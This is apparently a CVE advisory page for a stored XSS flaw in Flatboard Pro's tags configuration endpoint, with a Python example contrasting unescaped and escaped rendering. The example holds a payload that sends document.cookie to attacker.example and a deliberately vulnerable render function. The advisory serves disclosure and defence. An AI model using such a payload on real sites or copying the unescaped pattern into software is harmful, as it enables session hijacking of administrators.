CVE-2025-40722
Description
Stored cross-site scripting (XSS) vulnerability in Flatboard Pro versions prior to 3.2.2, caused by a lack of proper validation of user input supplied through the replace parameter of /config.php/tags.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Flatboard Pro versions prior to 3.2.2 contain a stored XSS vulnerability in the replace parameter of /config.php/tags, allowing attackers to inject arbitrary scripts.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in Flatboard Pro versions prior to 3.2.2. The flaw is due to insufficient validation of user input supplied via the replace parameter in /config.php/tags: the submitted value is persisted and later written back into a page without encoding, so an attacker-controlled script is stored and executed in the browser of whoever views that page, in practice an administrator, since /config.php/tags is a configuration endpoint.
Exploitation
The published description does not state which privilege level is needed to set the replace parameter; because /config.php/tags is a configuration endpoint, an authenticated account with access to it is the likely prerequisite. A crafted request to the endpoint stores the payload. When an administrator subsequently views the tags configuration page, the script executes in that administrator's session, which can be used for session hijacking or for follow-on actions performed with administrative rights.
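The store-then-render pattern described above, as an added example that is not Flatboard's code: a hypothetical tag-to-replacement mapping is stored unchanged, then rendered into a configuration page once verbatim (the stored XSS pattern) and once with context-appropriate HTML escaping. The sample tag values, including the attacker payload, are constructed for the example; the function names are the example's own. A small canary check shows how a tester would confirm that the payload survives into the page unescaped.

```python
import html

# Constructed sample data (not taken from Flatboard): a tag -> replace mapping
# as an admin might configure it, plus one hypothetical attacker-supplied value
# that breaks out of an attribute and injects a cookie-stealing script.
SAMPLE_TAGS = {
    ":smile:": "<img src='/img/smile.png' alt='smile'>",
    ":evil:": "\"><script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
}


def store_tag(tags: dict, tag: str, replace: str) -> dict:
    """Persist a mapping without touching the value. Storage is not where the
    bug is: the value is just data until it is rendered into HTML."""
    updated = dict(tags)
    updated[tag] = replace
    return updated


def render_tags_vulnerable(tags: dict) -> str:
    """Echo stored values into the configuration page verbatim. This is the
    pattern behind a stored XSS: the viewer's browser parses the attacker's
    markup as part of the page."""
    rows = "".join(
        f'<tr><td>{t}</td><td><input name="replace" value="{r}"></td></tr>'
        for t, r in tags.items()
    )
    return f"<table>{rows}</table>"


def render_tags_fixed(tags: dict) -> str:
    """Same page with every untrusted value escaped for the HTML context it
    lands in. quote=True also encodes ' and " so an attribute value cannot be
    broken out of (the PHP equivalent is htmlspecialchars with ENT_QUOTES)."""
    rows = "".join(
        f'<tr><td>{html.escape(t, quote=True)}</td>'
        f'<td><input name="replace" value="{html.escape(r, quote=True)}"></td></tr>'
        for t, r in tags.items()
    )
    return f"<table>{rows}</table>"


def reflects_unescaped(page: str, payload: str) -> bool:
    """Canary check a tester would run: the payload is only a problem if its
    markup survives into the rendered page verbatim."""
    return payload in page


def demo() -> dict:
    """Store both sample values, render the page both ways and report whether
    the attacker payload comes back unescaped in each rendering."""
    tags = store_tag({}, ":smile:", SAMPLE_TAGS[":smile:"])
    tags = store_tag(tags, ":evil:", SAMPLE_TAGS[":evil:"])
    payload = SAMPLE_TAGS[":evil:"]
    return {
        "vulnerable": reflects_unescaped(render_tags_vulnerable(tags), payload),
        "fixed": reflects_unescaped(render_tags_fixed(tags), payload),
    }


if __name__ == "__main__":
    print(demo())
```

The fix belongs at the point of output: escaping on the configuration view is what stops the script from running in the administrator's browser, whatever was accepted at storage time. Where a replacement value is meant to be emitted as live HTML elsewhere in the application, output encoding cannot be used there and the value has to be restricted to an allowlist instead; that is a separate design question from the configuration page this CVE concerns.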
Impact
Successful exploitation allows arbitrary JavaScript to run in the affected administrator's session. This could result in theft of session cookies, defacement, or other actions carried out with the administrator's privileges inside the application.
Mitigation
The vulnerability has been fixed in Flatboard Pro version 3.2.2. Users are advised to update immediately. No workarounds are available [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Flatboard Pro: versions < 3.2.2
Patches
No patch commit is linked in this index yet; the fix ships in Flatboard Pro 3.2.2 (see Mitigation).
References
News mentions
No linked articles in our index yet.